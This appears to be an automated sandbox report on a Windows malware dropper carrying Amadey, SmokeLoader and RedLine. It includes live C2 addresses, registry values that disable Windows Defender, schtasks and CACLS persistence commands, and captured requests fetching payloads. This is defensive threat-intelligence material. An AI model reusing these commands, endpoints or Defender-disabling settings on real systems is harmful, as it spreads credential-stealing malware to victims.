Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2023, 08:25 UTC
Static task
static1
Behavioral task
behavioral1
Sample
5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe
Resource
win10v2004-20230703-en
General
-
Target
5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe
-
Size
515KB
-
MD5
b7ab36f74e03f4816e4b3f20c3fe44d9
-
SHA1
ad674a4b50f0bebf4a4449b49d9e55b0ee14ce5b
-
SHA256
5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49
-
SHA512
0c857ce4ad3294f92277efc9929b4d3878aa35ad5c540ff335aed2710680705aa93c8986a989fc55c05aa8d1c494b2e36ee8c8480ab80b05bd6ccca3d7db16b1
-
SSDEEP
12288:MMrjy90z7gLOxot1zlloh1911yKLSbBf/iYvR1:/y67gLoQzlQ11XelniYZ1
Malware Config
Extracted
amadey
3.85
77.91.68.3/home/love/index.php
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
news
77.91.68.68:19071
-
auth_value
99ba2ffe8d72ebe9fdc7e758c94db148
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/files/0x000700000002326d-152.dat healer behavioral1/files/0x000700000002326d-153.dat healer behavioral1/memory/1328-154-0x00000000007B0000-0x00000000007BA000-memory.dmp healer -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a6700421.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection a6700421.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a6700421.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a6700421.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a6700421.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a6700421.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation b2546604.exe Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation danke.exe Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation EFD9.exe -
Executes dropped EXE 11 IoCs
pid Process 4880 v2070713.exe 4208 v9599233.exe 1328 a6700421.exe 864 b2546604.exe 4288 danke.exe 4444 c2155687.exe 2304 d1212362.exe 3908 danke.exe 1752 danke.exe 1740 EFD9.exe 5048 danke.exe -
Loads dropped DLL 3 IoCs
pid Process 3564 rundll32.exe 1756 rundll32.exe 688 rundll32.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" a6700421.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v9599233.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" v9599233.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v2070713.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" v2070713.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1976 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c2155687.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c2155687.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c2155687.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5036 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings EFD9.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1328 a6700421.exe 1328 a6700421.exe 4444 c2155687.exe 4444 c2155687.exe 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found 3148 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3148 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4444 c2155687.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1328 a6700421.exe Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found Token: SeShutdownPrivilege 3148 Process not Found Token: SeCreatePagefilePrivilege 3148 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 864 b2546604.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 4940 wrote to memory of 4880 4940 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe 85 PID 4940 wrote to memory of 4880 4940 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe 85 PID 4940 wrote to memory of 4880 4940 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe 85 PID 4880 wrote to memory of 4208 4880 v2070713.exe 86 PID 4880 wrote to memory of 4208 4880 v2070713.exe 86 PID 4880 wrote to memory of 4208 4880 v2070713.exe 86 PID 4208 wrote to memory of 1328 4208 v9599233.exe 87 PID 4208 wrote to memory of 1328 4208 v9599233.exe 87 PID 4208 wrote to memory of 864 4208 v9599233.exe 95 PID 4208 wrote to memory of 864 4208 v9599233.exe 95 PID 4208 wrote to memory of 864 4208 v9599233.exe 95 PID 864 wrote to memory of 4288 864 b2546604.exe 96 PID 864 wrote to memory of 4288 864 b2546604.exe 96 PID 864 wrote to memory of 4288 864 b2546604.exe 96 PID 4880 wrote to memory of 4444 4880 v2070713.exe 97 PID 4880 wrote to memory of 4444 4880 v2070713.exe 97 PID 4880 wrote to memory of 4444 4880 v2070713.exe 97 PID 4288 wrote to memory of 5036 4288 danke.exe 98 PID 4288 wrote to memory of 5036 4288 danke.exe 98 PID 4288 wrote to memory of 5036 4288 danke.exe 98 PID 4288 wrote to memory of 3748 4288 danke.exe 100 PID 4288 wrote to memory of 3748 4288 danke.exe 100 PID 4288 wrote to memory of 3748 4288 danke.exe 100 PID 3748 wrote to memory of 376 3748 cmd.exe 102 PID 3748 wrote to memory of 376 3748 cmd.exe 102 PID 3748 wrote to memory of 376 3748 cmd.exe 102 PID 3748 wrote to memory of 3424 3748 cmd.exe 103 PID 3748 wrote to memory of 3424 3748 cmd.exe 103 PID 3748 wrote to memory of 3424 3748 cmd.exe 103 PID 3748 wrote to memory of 1796 3748 cmd.exe 104 PID 3748 wrote to memory of 1796 3748 cmd.exe 104 PID 3748 wrote to memory of 1796 3748 cmd.exe 104 PID 3748 wrote to memory of 1036 3748 cmd.exe 105 PID 3748 wrote to memory of 1036 3748 cmd.exe 105 PID 3748 wrote to memory of 1036 3748 cmd.exe 105 PID 3748 wrote to memory of 3240 3748 cmd.exe 106 PID 3748 wrote to memory of 3240 3748 cmd.exe 106 PID 3748 wrote to memory of 3240 3748 cmd.exe 106 PID 3748 wrote to memory of 872 3748 cmd.exe 107 PID 3748 wrote to memory of 872 3748 cmd.exe 107 PID 3748 wrote to memory of 872 3748 cmd.exe 107 PID 4940 wrote to memory of 2304 4940 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe 108 PID 4940 wrote to memory of 2304 4940 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe 108 PID 4940 wrote to memory of 2304 4940 5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe 108 PID 4288 wrote to memory of 3564 4288 danke.exe 116 PID 4288 wrote to memory of 3564 4288 danke.exe 116 PID 4288 wrote to memory of 3564 4288 danke.exe 116 PID 3148 wrote to memory of 1740 3148 Process not Found 119 PID 3148 wrote to memory of 1740 3148 Process not Found 119 PID 3148 wrote to memory of 1740 3148 Process not Found 119 PID 1740 wrote to memory of 1560 1740 EFD9.exe 121 PID 1740 wrote to memory of 1560 1740 EFD9.exe 121 PID 1740 wrote to memory of 1560 1740 EFD9.exe 121 PID 1560 wrote to memory of 1756 1560 control.exe 123 PID 1560 wrote to memory of 1756 1560 control.exe 123 PID 1560 wrote to memory of 1756 1560 control.exe 123 PID 1756 wrote to memory of 4704 1756 rundll32.exe 125 PID 1756 wrote to memory of 4704 1756 rundll32.exe 125 PID 4704 wrote to memory of 688 4704 RunDll32.exe 126 PID 4704 wrote to memory of 688 4704 RunDll32.exe 126 PID 4704 wrote to memory of 688 4704 RunDll32.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe"C:\Users\Admin\AppData\Local\Temp\5314b22bc14a713529ce791f0b1246796b20afbcc7e8c151cb3f8d87bc638c49.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2070713.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2070713.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v9599233.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v9599233.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a6700421.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a6700421.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b2546604.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b2546604.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F6⤵
- Creates scheduled task(s)
PID:5036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:376
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:N"7⤵PID:3424
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:R" /E7⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:1036
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:N"7⤵PID:3240
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:R" /E7⤵PID:872
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:3564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c2155687.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c2155687.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1212362.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1212362.exe2⤵
- Executes dropped EXE
PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:3908
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:1752
-
C:\Users\Admin\AppData\Local\Temp\EFD9.exeC:\Users\Admin\AppData\Local\Temp\EFD9.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",4⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\55CJ.CPL",5⤵
- Loads dropped DLL
PID:688
-
-
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start wuauserv1⤵
- Launches sc.exe
PID:1976
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:5048
Network
-
Remote address:8.8.8.8:53Request68.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request158.240.127.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request9.228.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request164.113.222.173.in-addr.arpaIN PTRResponse164.113.222.173.in-addr.arpaIN PTRa173-222-113-164deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request26.35.223.20.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.3:80RequestPOST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tnagofb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 123
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jttdukeia.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 290
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mdxmyv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 159
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
ETag: "16400-5ffd5f45b7dbc"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request57.169.31.20.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ppfsa.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 229
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request0.77.109.52.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jcgkpxrtkm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 150
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ovhvhbxf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 313
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.30:80RequestGET /fuzz/raman.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.30
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 24 Jul 2023 07:59:57 GMT
ETag: "16b3b6-60137001d1940"
Accept-Ranges: bytes
Content-Length: 1487798
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request200.74.101.95.in-addr.arpaIN PTRResponse200.74.101.95.in-addr.arpaIN PTRa95-101-74-200deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request209.143.182.52.in-addr.arpaIN PTRResponse
-
515 B 365 B 6 5
HTTP Request
POST http://77.91.68.3/home/love/index.phpHTTP Response
200 -
260 B 5
-
1.3kB 846 B 9 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
260 B 5
-
741 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
3.8kB 94.8kB 75 74
HTTP Request
GET http://77.91.68.3/home/love/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.3/home/love/Plugins/clip64.dllHTTP Response
200 -
260 B 5
-
810 B 506 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
1.4kB 1.2kB 10 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
47.0kB 1.5MB 939 1100
HTTP Request
GET http://77.91.68.30/fuzz/raman.exeHTTP Response
200 -
260 B 5
-
260 B 5
-
71 B 157 B 1 1
DNS Request
68.32.126.40.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
158.240.127.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
9.228.82.20.in-addr.arpa
-
74 B 141 B 1 1
DNS Request
164.113.222.173.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
26.35.223.20.in-addr.arpa
-
207 B 207 B 3 3
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
57.169.31.20.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
0.77.109.52.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
200.74.101.95.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
209.143.182.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230KB
MD5b18c8e4199ae72f19aa7276c177a8f67
SHA1d27f0aded51fce63b81dcfd333f9c810c11e6c69
SHA256f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0
SHA5127f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78
-
Filesize
230KB
MD5b18c8e4199ae72f19aa7276c177a8f67
SHA1d27f0aded51fce63b81dcfd333f9c810c11e6c69
SHA256f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0
SHA5127f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78
-
Filesize
230KB
MD5b18c8e4199ae72f19aa7276c177a8f67
SHA1d27f0aded51fce63b81dcfd333f9c810c11e6c69
SHA256f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0
SHA5127f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78
-
Filesize
230KB
MD5b18c8e4199ae72f19aa7276c177a8f67
SHA1d27f0aded51fce63b81dcfd333f9c810c11e6c69
SHA256f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0
SHA5127f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78
-
Filesize
230KB
MD5b18c8e4199ae72f19aa7276c177a8f67
SHA1d27f0aded51fce63b81dcfd333f9c810c11e6c69
SHA256f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0
SHA5127f84215ce7599e8d2a88c37856ad8006a9aa1d2a2cba734a6797f60bd6f47ca13d62c01c94399f61bb7b94580b8db48d0c9f9d9e60740f304bec77b99f945f78
-
Filesize
230KB
MD5b18c8e4199ae72f19aa7276c177a8f67
SHA1d27f0aded51fce63b81dcfd333f9c810c11e6c69
SHA256f99f08ebd0ffdc31b720aedb7b0d2693918a5e205a01d7eda1237e3166dd78a0
